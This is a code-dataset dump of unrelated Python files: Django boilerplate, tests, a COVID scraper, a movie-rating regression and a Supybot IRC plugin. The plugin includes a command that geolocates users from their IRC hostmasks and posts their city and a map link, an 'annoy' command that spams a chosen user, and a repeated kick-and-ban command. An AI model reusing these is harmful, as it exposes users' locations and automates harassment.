blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 5
283
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
41
| license_type
stringclasses 2
values | repo_name
stringlengths 7
96
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 58
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 12.7k
662M
⌀ | star_events_count
int64 0
35.5k
| fork_events_count
int64 0
20.6k
| gha_license_id
stringclasses 11
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 43
values | src_encoding
stringclasses 9
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 7
5.88M
| extension
stringclasses 30
values | content
stringlengths 7
5.88M
| authors
sequencelengths 1
1
| author
stringlengths 0
73
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3040254d9e002106e561ff20aa92098f99b38eee | 6e77e4956005e3c0906dd9bc78e17026293d26a7 | /manage.py | e7b080c346adb3fef80260f72f6ab15f452d031d | [] | no_license | lenines/djangoAD | 191bdc4ebbdaa2ba5aa86e6bda55daff39cda4f6 | 11b8f1396e75592ff9c0d8f80610c87ea3d5c148 | refs/heads/master | 2020-06-04T22:39:54.490867 | 2014-05-14T18:35:25 | 2014-05-14T18:35:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 251 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "djangoAD.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| [
"[email protected]"
] | |
c4029a02879afac1579de64ece60784d40003ce5 | 7144d29d32343bd35a9fc9f169fed0eac9817a14 | /banner/urls.py | cc4af951984d3a6f49e0bf9b27b2585654f2dee8 | [] | no_license | spectatorqq/backstage-management-system | 3f030f6f42311d81bdccb931581c02f2dca2171b | 5086e97a65cead40e30426ed3c551c9378b57068 | refs/heads/master | 2020-09-20T04:00:43.718967 | 2019-11-27T08:42:12 | 2019-11-27T08:42:12 | 224,371,525 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py | from django.urls import path
from banner import views
urlpatterns = [
path('save_banner/', views.save_banner),
path('show_current_page/', views.show_current_page),
path('edit_carousel/', views.edit_carousel)
] | [
"[email protected]"
] | |
779f02e54dec316aae91f2c3db6455f6aea08182 | 4f718b014cd56215979a466c2ef3f2b6a82fbec1 | /venv/Scripts/django-admin.py | 600fb92973f9ab329362ba0bd7cd953c944b9382 | [] | no_license | carminejcorbo/CS416FPDeployment | 8a9bc9567ac8cc09a76b863ac76a6e8ccce87bbb | 58ffb539ee24fc870cb89a74cf10d8dbef8aa34a | refs/heads/master | 2023-02-23T03:52:28.575863 | 2023-01-04T19:00:41 | 2023-01-04T19:00:41 | 225,298,683 | 0 | 0 | null | 2023-02-07T21:23:27 | 2019-12-02T06:10:49 | Python | UTF-8 | Python | false | false | 164 | py | #!C:\Django Workspace\FreshShirts\venv\Scripts\python.exe
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
| [
"[email protected]"
] | |
09976773a29250a9dfcd0ec12efbc745d44041f3 | 8750c559722f1dc63d31f2df293a7d4feb71fc09 | /molotov/tests/test_slave.py | b6e47aa94ec42664075fa8dd0387322de09b4ed6 | [
"Apache-2.0"
] | permissive | ymoran00/molotov | 4f8017a90fd71c412f08355db98c72ea106ae8bf | 2533d9653160845bd9a40defcf2e39810ad80215 | refs/heads/master | 2020-08-17T22:00:31.724709 | 2019-12-16T09:53:11 | 2019-12-16T09:53:11 | 215,716,155 | 0 | 0 | Apache-2.0 | 2019-10-17T06:11:04 | 2019-10-17T06:11:03 | null | UTF-8 | Python | false | false | 1,123 | py | import os
import pytest
from molotov import __version__
from molotov.slave import main
from molotov.tests.support import TestLoop, dedicatedloop, set_args
_REPO = "https://github.com/loads/molotov"
NO_INTERNET = os.environ.get("NO_INTERNET") is not None
@pytest.mark.skipif(NO_INTERNET, reason="This test requires internet access")
class TestSlave(TestLoop):
@dedicatedloop
def test_main(self):
with set_args("moloslave", _REPO, "test") as out:
main()
if os.environ.get("TRAVIS") is not None:
return
output = out[0].read()
self.assertTrue("Preparing 1 worker..." in output, output)
self.assertTrue("OK" in output, output)
@dedicatedloop
def test_fail(self):
with set_args("moloslave", _REPO, "fail"):
self.assertRaises(Exception, main)
@dedicatedloop
def test_version(self):
with set_args("moloslave", "--version") as out:
try:
main()
except SystemExit:
pass
version = out[0].read().strip()
self.assertTrue(version, __version__)
| [
"[email protected]"
] | |
fdbc22579dbfd729a9c7cf738cd5dbd3f54004a6 | 2eae961147a9627a2b9c8449fa61cb7292ad4f6a | /test/test_migration_tax_return.py | 5ba3369f4cd1b2ccbec9996ca4e1a387c408f536 | [] | no_license | kgr-eureka/SageOneSDK | 5a57cc6f62ffc571620ec67c79757dcd4e6feca7 | 798e240eb8f4a5718013ab74ec9a0f9f9054399a | refs/heads/master | 2021-02-10T04:04:19.202332 | 2020-03-02T11:11:04 | 2020-03-02T11:11:04 | 244,350,350 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,941 | py | # coding: utf-8
"""
Sage Business Cloud Accounting - Accounts
Documentation of the Sage Business Cloud Accounting API. # noqa: E501
The version of the OpenAPI document: 3.1
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import openapi_client
from openapi_client.models.migration_tax_return import MigrationTaxReturn # noqa: E501
from openapi_client.rest import ApiException
class TestMigrationTaxReturn(unittest.TestCase):
"""MigrationTaxReturn unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def make_instance(self, include_optional):
"""Test MigrationTaxReturn
include_option is a boolean, when False only required
params are included, when True both required and
optional params are included """
# model = openapi_client.models.migration_tax_return.MigrationTaxReturn() # noqa: E501
if include_optional :
return MigrationTaxReturn(
legacy_id = 56,
id = '0',
displayed_as = '0',
path = '0',
created_at = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
updated_at = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
from_date = datetime.datetime.strptime('1975-12-30', '%Y-%m-%d').date(),
to_date = datetime.datetime.strptime('1975-12-30', '%Y-%m-%d').date(),
tax_return_frequency = openapi_client.models.base.Base(
legacy_id = 56,
id = '0',
displayed_as = '0',
__path = '0', ),
total_amount = 1.337,
gb = openapi_client.models.gb_box_data.GBBoxData(
box_1 = 1.337,
box_2 = 1.337,
box_3 = 1.337,
box_4 = 1.337,
box_5 = 1.337,
box_6 = 1.337,
box_7 = 1.337,
box_8 = 1.337,
box_9 = 1.337, ),
ie = openapi_client.models.ie_box_data.IEBoxData(
box_t1 = 1.337,
box_t2 = 1.337,
box_t3 = 1.337,
box_t4 = 1.337,
box_e1 = 1.337,
box_e2 = 1.337,
box_es1 = 1.337,
box_es2 = 1.337, )
)
else :
return MigrationTaxReturn(
)
def testMigrationTaxReturn(self):
"""Test MigrationTaxReturn"""
inst_req_only = self.make_instance(include_optional=False)
inst_req_and_optional = self.make_instance(include_optional=True)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
35fbc68d5d7a092f36ad7817eb98d630e7078ff9 | 0698da9cae7d49222742d99daf3cc2b1b618501c | /LoadingBar.py | d8f2efa5e2d8382fc0915b4dc5228726b35e415c | [] | no_license | Ahmad-Kaafi/Facial-recognition-project | deee4a9b1dac278194e9a0ee54e74f1ef5acc2d1 | 90ce3ecfcbb86e44df8d79beab1d32018b499afb | refs/heads/master | 2020-04-28T12:21:10.259381 | 2019-03-25T18:06:44 | 2019-03-25T18:06:44 | 175,272,845 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,045 | py | from tkinter import *
from PIL import Image, ImageTk
import ttk
class DemoSplashScreen:
def __init__(self, parent):
self.parent = parent
self.aturSplash()
self.aturWindow()
def aturSplash(self):
self.gambar = Image.open("Green.png")
self.imgSplash = ImageTk.PhotoImage(self.gambar)
def aturWindow(self):
lebar, tinggi = self.gambar.size
setengahLebar = (self.parent.winfo_screenwidth()-lebar)//2
setengahTinggi = (self.parent.winfo_screenheight()-tinggi)//2
self.parent.geometry("%ix%i+%i+%i"%(lebar, tinggi, setengahLebar, setengahTinggi))
Label(self.parent, image = self.imgSplash).pack()
if __name__ == "__main__":
root = Tk()
root.overrideredirect(True)
progressbar = ttk.Progressbar(orient=HORIZONTAL, length=10000, mode='determinate')
progressbar.pack(side="bottom")
app = DemoSplashScreen(root)
progressbar.start()
root.after(1000, root.destroy)
root.mainloop()
| [
"[email protected]"
] | |
2f70ec7d64d3e0d0ef8953864baafa9c81fbf3fa | a34a580a222eeda9fb0230bdf257f2c65b7bc72a | /Develop/psjDevelop/searchFY.py | d0d7447db89fa782ccd7b50e6bd0b41aaf23b8fb | [] | no_license | diwangtseb/COVvisualization | 3551dc91f8d2b71f631fdd52755d33be2c8d982c | ccc0c4aef1868b0ed6bf81406ce843045c426ff6 | refs/heads/master | 2022-04-09T09:06:43.878526 | 2020-03-08T07:24:04 | 2020-03-08T07:24:04 | 245,126,818 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,190 | py | import requests
import json
import time
def GetDetailsData(url, headers):
"""
爬取数据
:param url:
:param headers:
:return:
"""
r = requests.get(url, headers)
res = json.loads(r.text)
data_all = json.loads(res['data'])
details = [] # 当日详细数据
update_time = data_all["lastUpdateTime"]
data_country = data_all["areaTree"] # list 25个国家
data_province = data_country[0]["children"] # 中国各省
for pro_infos in data_province:
province = pro_infos["name"]
for city_infos in pro_infos["children"]:
city = city_infos["name"]
confirm = city_infos["total"]["confirm"]
confirm_add = city_infos["today"]["confirm"]
heal = city_infos["total"]["heal"]
dead = city_infos["total"]["dead"]
details.append([update_time, province, city, confirm, confirm_add, heal, dead])
return details
def GetHistoryData(url, headers):
"""
爬取数据
:param url:
:param headers:
:return:
"""
r = requests.get(url, headers)
res = json.loads(r.text)
data_all = json.loads(res['data'])
history = {} # 历史数据
for i in data_all["chinaDayList"]:
ds = "2020."+i["date"]
tup = time.strptime(ds, "%Y.%m.%d")
ds = time.strftime("%Y-%m-%d", tup) # 改变时间格式,由于数据库是datetime类型
confirm = i["confirm"]
suspect = i["suspect"]
heal = i["heal"]
dead = i["dead"]
history[ds] = {"confirm": confirm, "suspect": suspect, "heal": heal, "dead": dead,
"confirm_add": 0, "suspect_add": 0, "heal_add": 0, "dead_add": 0}
for i in data_all["chinaDayAddList"]:
ds = "2020." + i["date"]
tup = time.strptime(ds, "%Y.%m.%d")
ds = time.strftime("%Y-%m-%d", tup) # 改变时间格式,由于数据库是datetime类型
confirm = i["confirm"]
suspect = i["suspect"]
heal = i["heal"]
dead = i["dead"]
history[ds].update({"confirm_add": confirm, "suspect_add": suspect, "heal_add": heal, "dead_add": dead})
return history
| [
"[email protected]"
] | |
9dc27008134db0b35326d29d2df481dd1ecbf194 | df241cd4aacb97fb5562a08ea4f912e9bd348657 | /list5/toy_story.py | 4e62b77003fe671c41f33424d82178dab0e6001f | [] | no_license | jakubdabek/python-uni | a8c7a323b1389fbe46e96b3c5fe9d4f1a5e825ec | 0380bbce5f42a7b8cce2f678986c48b17b40f0a9 | refs/heads/master | 2022-11-18T18:59:55.229564 | 2020-07-05T17:42:12 | 2020-07-05T18:01:25 | 244,458,573 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,467 | py | from pathlib import Path
from typing import Union, Optional, Tuple
from sklearn.linear_model import LinearRegression
from matplotlib import pyplot as plt
from list4.overload import flatten
import pandas as pd
import numpy as np
def load_data(file_name: str, *, dir_path: Optional[Union[Path, str]] = None) -> pd.DataFrame:
if dir_path is None:
dir_path = Path(__file__).parent / 'ml-latest-small'
elif not isinstance(dir_path, Path):
dir_path = Path(dir_path)
return pd.read_csv(dir_path / file_name)
def load_movies_find_id(title: str) -> Tuple[pd.Series, int]:
movies = load_data("movies.csv")
return movies["movieId"], movies.loc[movies["title"] == title, "movieId"][0]
def relevant_data(ratings: pd.DataFrame, movie_ids: pd.Series, movie_id: Optional[int], max_movie_id: int) -> pd.DataFrame:
ratings = ratings.drop('timestamp', axis=1)
ratings = ratings[ratings['movieId'] <= max_movie_id]
ratings = pd.pivot_table(ratings, index='userId', columns='movieId', values='rating')
ratings = ratings.reindex(columns=movie_ids[movie_ids <= max_movie_id], copy=False)
if movie_id is not None:
ratings = ratings[ratings[movie_id].notna()]
ratings.fillna(0.0, inplace=True)
return ratings
def linear_regression_dataset(ratings: pd.DataFrame, movie_id: int, *, inplace=False) -> Tuple[pd.DataFrame, pd.Series]:
movie_ratings = ratings[movie_id]
return ratings.drop(movie_id, axis=1, inplace=inplace), movie_ratings
def main():
movie_ids, toy_story_id = load_movies_find_id("Toy Story (1995)")
ratings = load_data("ratings.csv")
max_movie_ids = pd.Series(flatten([10**i, 10**i * 2, 10**i * 5] for i in range(1, 6)))
# max_movie_ids = [200]
# max_movie_ids = [10, 100, 200, 500, 1000, 2500, 5000, 7500, 10000]
bound = len(max_movie_ids[max_movie_ids < movie_ids.max()])
max_movie_ids = max_movie_ids[:bound+1]
scores = []
for max_movie_id in max_movie_ids:
data = relevant_data(ratings, movie_ids, toy_story_id, max_movie_id)
(_, toy_story) = linear_regression_dataset(data, toy_story_id, inplace=True)
lr: LinearRegression = LinearRegression().fit(data, toy_story)
scores.append(lr.score(data, toy_story))
lr: LinearRegression = LinearRegression().fit(data[:-15], toy_story[:-15])
predictions: np.ndarray = lr.predict(data[-15:])
comparison = pd.DataFrame(dict(prediction=predictions, actual=toy_story[-15:]))
movies_num = len(data.columns)
print(f"{'='*8} {movies_num:6} movies {'='*8}")
print(f"score: {lr.score(data[-15:], toy_story[-15:])}")
print(comparison)
print(scores)
plt.title("model errors")
plt.plot(max_movie_ids, scores)
plt.xlabel("max movie id")
plt.ylabel("error")
plt.xscale('log')
plt.show()
plt.title("model errors")
plt.plot([len(movie_ids[movie_ids < num]) for num in max_movie_ids], scores)
plt.xlabel("number of movies")
plt.ylabel("error")
plt.xscale('log')
plt.show()
fig, ax = plt.subplots()
ax.grid(True)
xs = np.arange(len(toy_story[-15:])) + 1
ax.scatter(xs, predictions, c='coral', s=50, label='predicted')
ax.scatter(xs, toy_story[-15:], c='green', s=30, label='expected')
ax.set_title(f'Regression model prediction results ({movies_num} movies)')
ax.legend()
fig.tight_layout()
plt.show()
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
fe14e2773566f9017c9e893c04fd4ab422bb744a | 5d707e323f945ed5183b342f67ee23072755ac08 | /General/plugin.py | 9081fa8c2a5cfcba4f10e2505fbbe5d77e79033c | [] | no_license | scornflakes/StewieGriffin | 1826b3f52ee2274b2daf9f4b674340a8666b09bd | 678db2f855550ae3eefb174e62b8b41fb63be359 | refs/heads/master | 2020-12-03T05:10:34.385457 | 2012-07-19T11:20:09 | 2012-07-19T11:20:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,253 | py | ###
# Copyright (c) 2011, Anthony Boot
# All rights reserved.
#
# Licenced under GPLv2
# In brief, you may edit and distribute this as you want, provided the original
# and modified sources are always available, this license notice is retained
# and the original author is given full credit.
#
# There is no warrenty or guarentee, even if explicitly stated, that this
# script is bug and malware free. It is your responsibility to check this
# script and ensure its safety.
#
###
import supybot.utils as utils
from supybot.commands import *
import supybot.plugins as plugins
import supybot.ircutils as ircutils
import supybot.callbacks as callbacks
import re,time,json,random
import supybot.ircmsgs as ircmsgs
import supybot.schedule as schedule
class General(callbacks.PluginRegexp):
"""Some general purpose plugins."""
threaded=True
# All regexps
# regexps=['capsKick','selfCorrect','userCorrect','saveLast','greeter','awayMsgKicker','ytSnarfer','pasteSnarfer']
#Remove from this array to disable any regexps
regexps=['selfCorrect','saveLast','greeter','awayMsgKicker','ytSnarfer','pasteSnarfer']
#Set to false to disable.
consolechannel = "##sgoutput"
buffer={}
buffsize = 10
alpha=[]
alpha+='QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm'
annoyUser=[]
random.seed()
random.seed(random.random())
kickuser={}
#####################
### Commands ###
#####################
def banmask(self, irc, msg, args, hostmask):
"""<nick|hostmask>
Gets IP based hostmask for ban. """
failed = False
ipre = re.compile(r"[0-9]{1,3}[.-][0-9]{1,3}[.-][0-9]{1,3}[.-][0-9]")
bm = ipre.search(hostmask)
try:
bm = bm.group(0)
bm = bm.replace(".","?")
bm = bm.replace("-","?")
irc.reply("*!*@*"+bm+"*")
if(self.consolechannel): irc.queueMsg(ircmsgs.privmsg(self.consolechannel, "BANMASK: *!*@*"+bm+"* returned for "+msg.nick))
except:
hostmask = hostmask.split("@")[1]
count=0;
while count<10:
hostmask = hostmask.replace(str(count),"?")
count+=1
irc.reply("*!*@%s"%(hostmask),prefixNick=False)
if(self.consolechannel): irc.queueMsg(ircmsgs.privmsg(self.consolechannel, "BANMASK: *!*@%s returned for %s"%(hostmask,msg.nick)))
banmask = wrap(banmask, ["hostmask"])
def rand(self,irc,msg,args,min,max,num):
"""[min] <max> [amount]
Generates a random number from [min] to <max>, [amount] number of times."""
random.seed()
random.seed(random.random())
if min > max and not num:
num = max
max = min
min = 0
elif min > max:
min,max = max,min
if not num:
num = 1
if not max:
max = min
min = 0
try:
min = int(min)
max = int(max)
num = int(num)
except:
irc.error("Non numeric value(s) given")
return 0
if num > 25:
num = 25
x = 0;
output = ""
while x < num:
output+=str(int(random.randint(min,max)))+" "
x+=1
irc.reply(output)
rand = wrap(rand,['int',optional('int'),optional('int')])
def stewieQuote(self, irc, msg, args):
data = utils.web.getUrl("http://smacie.com/randomizer/family_guy/stewie_griffin.html")
quote = data.split('<td valign="top"><big><big><big><font face="Comic Sans MS">')[1].split('</font></big></big></big></td>')[0]
irc.reply(quote,prefixNick=False)
# stewie = wrap(stewieQuote)
def geoip(self,irc,msg,args,ohostmask):
ohostmask = ohostmask.split('@')[1]
if msg.nick.lower() in ohostmask:
irc.reply('Unable to locate IP - User cloak detected'%ohostmask)
return None
ipre = re.compile(r"[0-9]{1,3}[.-][0-9]{1,3}[.-][0-9]{1,3}[.-][0-9]")
hostmask = ipre.search(ohostmask)
if hostmask:
try:
hostmask = hostmask.group(0)
hostmask = hostmask.replace("-",".")
except:
hostmask = hostmask
else:
hostmask = ohostmask
self.log.info("GeoIP: %s",hostmask)
# if 'gateway' in hostmask:
# hostmask = hostmask.split('ip.')[1]
data = utils.web.getUrl('http://infosniper.net/?ip_address=%s'%hostmask)
data = data.split('<!-- ################################################################################## -->')[5]
data = re.split('<[^<>]+>|\\n| | | | ',data)
x = 0
info = []
while x < len(data):
if data[x] is '' or (len(data[x])<2 and ' ' in data[x]) :
pass
else:
info+=[data[x]]
x+=1
country = info[20]
city = info[5]
tz = info[27]
to = info[30]
if '-' not in to:
to = '+%s'%to
lat = info[13]
lon = info[21]
provider = info[11]
if 'EUKHOST LTD' in provider:
irc.reply("Unable to locate IP - Not found")
return None
tinyurl=utils.web.getUrl('http://tinyurl.com/api-create.php?url=http://maps.google.com/maps?q=%s,%s'%(lat,lon))
irc.reply('%s is near %s in %s (%s). The timezone is %s and is UTC/GMT%s. The provider is %s'%(hostmask,city,country,tinyurl,tz,to,provider))
return None
geoip = wrap(geoip, ['hostmask'])
def report(self,irc,msg,args,user,reason):
"""<User> <reason>
Reports a user to Xenocide for him to act on when he comes back from afk or [NotHere]."""
t = time.localtime()
if int(t[2]) < 10: date = '0{0}'.format(t[2])
else: date = str(t[2])
if int(t[1]) < 10: month = '0{0}'.format(t[1])
else: month = str(t[1])
if int(t[3]) < 10: h = '0{0}'.format(t[3])
else: h = str(t[3])
logFile = '#powder.{0}-{1}-{2}.log'.format(date,month,t[0])
# irc.queueMsg(ircmsgs.privmsg('[NotHere]','User {0} has reported {1} for {2}. Log file is {3} and log time will be around {4}{5}'.format(msg.nick,user,reason,logFile,h,t[4])))
# irc.queueMsg(ircmsgs.privmsg('Xenocide','User {0} has reported {1} for {2}. Log file is {3} and log time will be around {4}{5}'.format(msg.nick,user,reason,logFile,h,t[4])))
irc.queueMsg(ircmsgs.privmsg('Memoserv','SEND Xenocide User {0} has reported {1} in {6} for {2}. Log file is {3} and log time will be around {4}{5}'.format(msg.nick,user,reason,logFile,h,t[4],msg.args[0])))
irc.replySuccess('Report sent.')
report = wrap(report,['nick','text'])
def bug(self,irc,msg,args,cmd):
"""<plugin>
Use this command when Stewie has a bug. It places a note in the logs and sends Xenocide a message."""
self.log.error("****Error in {} reported by {}****".format(cmd,msg.nick))
irc.queueMsg(ircmsgs.privmsg('Memoserv','SEND Xenocide Bug found in {} by {}.'.format(cmd,msg.nick)))
irc.replySuccess("Bug reported.")
bug = wrap(bug,['something'])
def kicked(self,irc,args,channel,nick):
"""[user]
Shows how many times [user] has been kicked and by who. If [user] isn't provided, it returns infomation based on the caller."""
if not nick: ref = msg.nick.lower()
else: ref = nick.lower()
with open('KCOUNT','r') as f:
kickdata = json.load(f)
try:
kickdata = kickdata[ref]
reply = "{} has been kicked {} times, ".format(nick, kickdata['total'])
for each in kickdata:
if each in 'total': continue
reply='{} {} by {},'.format(reply,kickdata[each],each)
irc.reply(reply[:-1].replace("o","\xF0"))
except:
irc.reply('{} hasn\'t been kicked it seems.'.format(nick))
kicked = wrap(kicked,[optional('nick')])
def annoy(self,irc,msg,args,channel,nick,mins):
"""[channel] <nick> [mins]
Makes stewie repeat everything the user says via a NOTICE for 2 minutes if [mins] is not specified. Blame Doxin for this."""
if not mins or mins == 0: mins = 2
expires = time.time()+(mins*60)
try:
def f():
self.annoyUser.pop(self.annoyUser.index(nick.lower()))
self.log.info('ANNOY -> No longer annoying {}'.format(nick))
schedule.addEvent(f,expires)
except:
irc.error("I borked.")
return 0
self.log.info('ANNOY -> Annoying {} for {} minutes'.format(nick,mins))
self.annoyUser+=[nick.lower()]
annoy = wrap(annoy,['op','nickInChannel',optional('float')])
def justme(self,irc,msg,args,url):
"""<url>
Checks if a website is up or down (using isup.me)"""
try: url = url.split("//")[1]
except: pass
data = utils.web.getUrl('http://isup.me/{}'.format(url))
if 'is up.' in data: irc.reply("It's just you.")
elif 'looks down' in data: irc.reply("It's down.")
else: irc.error("Check URL and try again")
justme = wrap(justme,(['something']))
def multikick(self,irc,msg,args,channel,nick,num,message):
"""<nick> <num> [message]
Kicks <nick> every time [s]he talks up to <num> (max 10) times with [message]. Use #n to insert number of remaining kicks."""
if not channel: channel = "#powder"
try: num = int(num)
except:
irc.error("Non-numeric value given.")
return 0
if num > 10: num = 10
nick = nick.lower()
self.kickuser[nick]={}
self.kickuser[nick]['num'] = num
if not message or message == "":
message = "#n kick(s) remaining."
self.kickuser[nick]['msg'] = message
irc.queueMsg(ircmsgs.notice(msg.nick,("Kicking anyone with {} in their nick {} times.".format(nick,num))))
multikick = wrap(multikick, ['op',('haveOp','Kick a user'),'something','something',optional('text')])
#####################
### RegExps ###
#####################
def greeter(self, irc, msg, match):
r"^(hello|hi|sup|hey|o?[bh]ai|wa+[sz]+(a+|u+)p?|Bye+|cya+|later[sz]?)[,. ]+(stewi?e?[griffin]?|bot|all|there)"
if "," in match.group(0):
hail = match.group(0).split(",")[0]
elif "." in match.group(0):
hail = match.group(0).split(".")[0]
else:
hail = match.group(0).split(" ")[0]
self.log.info("Responding to %s with %s"%(msg.nick, hail))
if(self.consolechannel): irc.queueMsg(ircmsgs.privmsg(self.consolechannel, "GREETER: Responding to %s with %s"%(msg.nick,hail)))
irc.reply("%s, %s"%(hail,msg.nick), prefixNick=False)
greeter = urlSnarfer(greeter)
def awayMsgKicker(self, irc, msg, match):
r"(is now (set as)? away [-:(] Reason |is no longer away : Gone for|is away:)"
self.log.info("KICKING %s for away announce"%msg.nick)
if(self.consolechannel):irc.queueMsg(ircmsgs.privmsg(self.consolechannel, "KICK: %s for away announcement (automatic)"%msg.nick))
self._sendMsg(irc, ircmsgs.kick(msg.args[0], msg.nick, "Autokick: Spam (Away/Back Announce)"))
awayMsgKicker = urlSnarfer(awayMsgKicker)
def ytSnarfer(self, irc, msg, match):
r".+youtube[.]com.+v=[0-9A-z\-_]{11}.*"
self.log.info("ytSnarfer - Active")
url = match.group(0)
url = url.split(" ")
for x in url:
if "youtu" in x:
url = url[url.index(x)]
if url.find("v=") != -1 or url.find("&") != -1:
if url.find("v=") != -1:
url = url.split("v=")[1]
if url.find("&") != -1:
url = url.split("&")[0]
else:
url = url[-11:]
self.log.info("ytSnarfer - Video ID: %s"%(url))
url="http://www.youtube.com/watch?v="+url
data = utils.web.getUrl(url)
# data = data.split("‪")[1].split("‬")[0]
data = data.split('<title>')[1].split('</title>')[0].split('\n')[1].strip()
data = data.replace(""","\'").replace("'", "'").replace("&","&")
irc.reply('Youtube video is "%s"'%data, prefixNick=False)
self.log.info("ytSnarfer - Done.")
if(self.consolechannel):irc.queueMsg(ircmsgs.privmsg(self.consolechannel, "%s is %s"%(url,data)))
return None
ytSnarfer = urlSnarfer(ytSnarfer)
def capsKick(self,irc,msg,match):
r".+"
data = match.group(0)
data=data.strip('\x01ACTION').strip('\x01').strip('\x02').strip('\x07').strip('\x0f')
knownCapsNicks = ['UBERNESS','ADL']
for each in knownCapsNicks:
data = data.strip(each)
data = list(data)
if len(data) < 15: return 0 #Simon: Increased from 5 to 15, was making quite a few people unhappy
length=0
caps=0
for each in data:
if each in self.alpha:
length+=1
if each in each.upper():
caps+=1
self.log.warning('{0} {1} {2}'.format(length,caps,int((float(caps)/length)*100)))
if int((float(caps)/length)*100) > 60:
self.log.info('Kicking {0} from {1} for caps rage.'.format(msg.nick,msg.args[0]))
if(self.consolechannel):irc.queueMsg(ircmsgs.privmsg(self.consolechannel, "KICK: %s for excessive caps. (automatic)"%msg.nick))
with open('KCOUNT','r') as f:
kd = json.load(f)
with open('KCOUNT','w') as f:
try: kd[msg.nick.lower()]+=1
except: kd[msg.nick.lower()]=1
f.write(json.dumps(kd,sort_keys=True,indent=4))
reason='{0} - Kicked {1} time'.format('Excessive Caps',kd[msg.nick.lower()])
if kd[msg.nick.lower()] > 1:
reason = '{0}s'.format(reason)
del kd
irc.queueMsg(ircmsgs.kick(msg.args[0], msg.nick, reason))
capsKick = urlSnarfer(capsKick)
def pasteSnarfer(self,irc,msg,match):
r"http://pastebin[.]com/[A-Za-z0-9]{8}"
url = match.group(0)
self.log.info('Pastbin Found - {0}'.format(url))
page = utils.web.getUrl(url)
paste={}
paste['name']=page.split('<h1>')[1].split('</h1>')[0]
page = page.split('<div class="paste_box_line2">')[1].split('</div>')[0].strip().split('|')
try:
paste['by']=page[0].split('">')[1].split('</a>')[0]
except:
paste['by']=page[0].split(':')[1]
paste['date']=page[1][1:-1]
paste['syntax']=page[2].split('>')[1].split('<')[0]
paste['size']=page[3].split(':')[1][1:-1]
paste['expires']=page[5].split(':')[1][1:]
if 'None' in paste['syntax']: paste['syntax']='Plain Text'
irc.reply('Pastebin is {0} by {1} posted on {2} and is written in {3}. The paste is {4} and expires {5}'.format(paste['name'],paste['by'],paste['date'],paste['syntax'],paste['size'],paste['expires']),prefixNick=False)
pasteSnarfer = urlSnarfer(pasteSnarfer)
def selfCorrect(self,irc,msg,match):
r"^s[/].*[/].*$"
match = match.group(0)
data = match.split('/')
newData = []
x=0
while x < len(data):
if '\\' in data[x]:
newData+=['{0}/{1}'.format(data[x][:-1],data[x+1])]
x+=2
else:
newData+=[data[x]]
x+=1
data=newData
channel = msg.args[0]
for each in self.buffer[channel]:
if msg.nick in each[0]:
output = each[1]
if (len(data)-1)%2 is 0:
x=1
while x < len(data):
output=output.replace(data[x],data[x+1])
x+=2
self.log.info('Changing {0} to {1}'.format(each[1],output))
irc.reply('<{0}> {1}'.format(each[0],output),prefixNick=False)
return 0
irc.error('Not found in buffer')
selfCorrect = urlSnarfer(selfCorrect)
def userCorrect(self,irc,msg,match):
r"^u[/].*[/].*[/].*$"
match = match.group(0)
data = match.split('/')
user = data[1]
newData = []
x=0
while x < len(data):
if '\\' in data[x]:
newData+=['{0}/{1}'.format(data[x][:-1],data[x+1])]
x+=2
else:
newData+=[data[x]]
x+=1
data=newData
channel = msg.args[0]
for each in self.buffer[channel]:
print user.lower(),each[0].lower(),user.lower() is each[0].lower()
if user.lower() in each[0].lower():
output = each[1]
x=2
try:
while x < len(data):
output=output.replace(data[x],data[x+1])
x+=2
except: irc.error('Not enough arguments')
self.log.info('Changing {0} to {1}'.format(each[1],output))
irc.reply('<{0}> {1}'.format(each[0],output),prefixNick=False)
return 0
irc.error('Not found in buffer')
userCorrect = urlSnarfer(userCorrect)
def saveLast(self,irc,msg,match):
r".+"
channel = msg.args[0]
try: self.buffer[channel]
except: self.buffer[channel]=[]
# Stuff for multikick
for each in self.kickuser:
if each in msg.nick.lower() and not self.kickuser[each]['num'] <= 0:
irc.queueMsg(ircmsgs.ban(msg.args[0], msg.nick))
irc.queueMsg(ircmsgs.kick(msg.args[0], msg.nick, "{}".format(self.kickuser[each]['msg'].replace('#n',str(self.kickuser[each]['num'])))))
self.kickuser[each]['num']-=1
def un():
irc.queueMsg(ircmsgs.unban(msg.args[0],msg.nick))
schedule.addEvent(un,time.time()+random.randint(30,120))
# END
line = match.group(0).replace('\x01ACTION','*').strip('\x01')
if msg.nick.lower() in self.annoyUser:
def fu():
irc.queueMsg(ircmsgs.IrcMsg('NOTICE {} :\x02\x03{},{}{}'.format(msg.nick,random.randint(0,15),random.randint(0,15),line)))
schedule.addEvent(fu,time.time()+random.randint(2,60))
self.buffer[channel].insert(0,[msg.nick,line])
